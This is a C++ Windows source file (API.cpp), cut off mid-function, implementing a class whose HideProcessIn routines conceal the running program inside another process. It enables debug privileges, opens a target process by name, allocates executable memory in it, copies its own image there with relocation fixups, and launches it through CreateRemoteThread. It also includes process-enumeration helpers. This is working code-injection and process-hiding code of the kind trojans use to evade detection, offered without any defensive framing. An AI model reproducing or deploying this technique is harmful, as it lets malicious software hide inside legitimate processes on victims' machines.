// API.cpp: implementation of the API class.
//
//////////////////////////////////////////////////////////////////////
#include "API.h"
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
#define LOAD_BASE_ADDR 0x03140000
CAPI::CAPI()
{
Init();
}
CAPI::~CAPI()
{
}
CAPI::Init()
{
GetOSVersion();
m_module=GetModuleHandle(NULL);
}
void CAPI::GetOSVersion(void)
{
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(GetVersionEx(&osvi)==FALSE) {
DMsgBox("Unable to get version info GetOSVersion()");
}
if(osvi.dwPlatformId==VER_PLATFORM_WIN32s) {
DMsgBox("This application does not run under WIN32s!");
}
if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
m_bIsWinNT = 1;
else
m_bIsWinNT = 0;
}
BOOL CAPI::HideProcessIn(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess,BOOL bNtHideAll)
{
EnableDebugPriv();
if(m_bIsWinNT)
{
if(!bNtHideAll)
return HideProcessInNT(szRemoteProcess,pMyMainProcess);
else
return HideProcessInNT_2_All(pMyMainProcess);
}
else
{
return HideProcessIn9X(pMyMainProcess);
}
return TRUE;
}
BOOL CAPI::HideProcessInNT(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess)
{
unsigned long lProcessID=GetNTProcessIDbyName(szRemoteProcess);
return HideProcessInNTbyID(lProcessID,pMyMainProcess);
}
BOOL CAPI::HideProcessInNTbyID(unsigned long lProcessID,LPTHREAD_START_ROUTINE pMyMainProcess)
{
if(lProcessID==-1)
return FALSE;
//dont inject to our process
if(GetCurrentProcessId()==lProcessID)
return FALSE;
DMsgBox("1");
HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lProcessID);
//open process error. dont have right
if(hProc==NULL)
return FALSE;
HMODULE lnewModule=(HMODULE) LOAD_BASE_ADDR;
//alloc mem for our process
//VirtualFreeEx(hProc,lnewModule,0,MEM_RELEASE);
//compute our process image size
DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(m_module))->SizeOfImage;
// char *pMem=(char *)VirtualAllocEx(hProc,m_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
//----------------------------------------------
DMsgBox("2");
char *pMem=NULL;
int x=0;
while((pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
{
lnewModule-=1024;//one page??
if(((unsigned long)lnewModule)<0x10000)
return FALSE;//没有希望了
x=GetLastError();
}
if(pMem==NULL)
{
DMsgBox("VirtualAllocEx Error,多次分配后失敗");
return FALSE;
}
DMsgBox("3");
char szMsg[200];
if((long)pMem!=LOAD_BASE_ADDR)
{
sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 多次分配后成功!",m_module,lnewModule,pMem);
DMsgBox(szMsg);
}
else
{
sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 一次分配成功!",m_module,lnewModule,pMem);
DMsgBox(szMsg);
}
//-------------------------------------------------????????????????
if((long)pMem!=(long)lnewModule)
{
lnewModule=(HMODULE)pMem;
DMsgBox("(pMem!=lnewModule)");
}
//-------------------------------------------------
// copy our process
DWORD dwOldProt,dwNumBytes,i;
MEMORY_BASIC_INFORMATION mbi;
//get my bin code
char* pMyExeData=new char[dwSize];
long lMyID=GetCurrentProcessId();
HANDLE hMyProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lMyID);
DWORD dRead;
ReadProcessMemory(hMyProc,m_module, pMyExeData,dwSize,&dRead);
//fix relocation table
FixRelocationTable(pMyExeData,dwSize,(unsigned long)m_module,(unsigned long)pMem);
VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
if(!(mbi.Protect & PAGE_GUARD)) {
for(i=0;i<mbi.RegionSize;i+=0x1000) {
VirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
WriteProcessMemory(hProc,pMem+i,pMyExeData+i,0x1000,&dwNumBytes);
}
}
pMem+=mbi.RegionSize;
VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
}
// Create a remote thread in the other process
DWORD dwRmtThdID;
//run it ine new enter point!!
long l=(char*)lnewModule-(char*)m_module;
HANDLE hRmtThd=CreateRemoteThread(hProc,NULL,0,
(LPTHREAD_START_ROUTINE)((long)pMyMainProcess+(long)l),
(LPVOID)lnewModule,0,&dwRmtThdID);
if(hRmtThd==NULL) {
DMsgBox("Could create remote thread error!");
return FALSE;
}
CloseHandle(hProc);
return TRUE;
}
/*******************************************************************
return value: -1 FALSE other ProcessID
only for winnt!
********************************************************************/
//#include "psapi.h"
//#pragma comment(lib, "Psapi.lib")
typedef BOOL (WINAPI* p_EnumProcesses )(DWORD * lpidProcess,DWORD cb, DWORD * cbNeeded );
typedef BOOL (WINAPI* p_EnumProcessModules )( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded );
typedef DWORD (WINAPI* p_GetModuleBaseName) ( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize );
long CAPI::GetNTProcessIDbyName(char *szName)
{
if((!m_bIsWinNT)||(!szName))
return -1;
HMODULE hModule=LoadLibrary("psapi.dll");
if(hModule==NULL)
return -1;
p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses");
p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules");
p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA");
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
return -1;
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Print the name and process identifier for each process.
for ( i = 0; i < cProcesses; i++ )
{
char szProcessName[MAX_PATH] = "";
// Get a handle to the process.
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i] );
// Get the process name.
if ( hProcess )
{
HMODULE hMod;
DWORD cbNeeded;
if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH );
if(_stricmp(szName,szProcessName)==0)
{//found process
CloseHandle (hProcess);
return aProcesses[i];
}
}
CloseHandle (hProcess);
}//end if
}
return -1;
}
long CAPI::GetAll(_s_process_info_* spInfo)
{
int nRet=0;
if((!m_bIsWinNT)||(!spInfo))
return nRet;
HMODULE hModule=LoadLibrary("psapi.dll");
if(hModule==NULL)
return nRet;
p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses");
p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules");
p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA");
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
return -1;
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Print the name and process identifier for each process.
for ( i = 0; i < cProcesses; i++ )
{
char szProcessName[MAX_PATH] = "";
// Get a handle to the process.
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i] );
// Get the process name.
if ( hProcess )
{
HMODULE hMod;
DWORD cbNeeded;
if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH );
nRet++;
if(nRet>=MAX_PR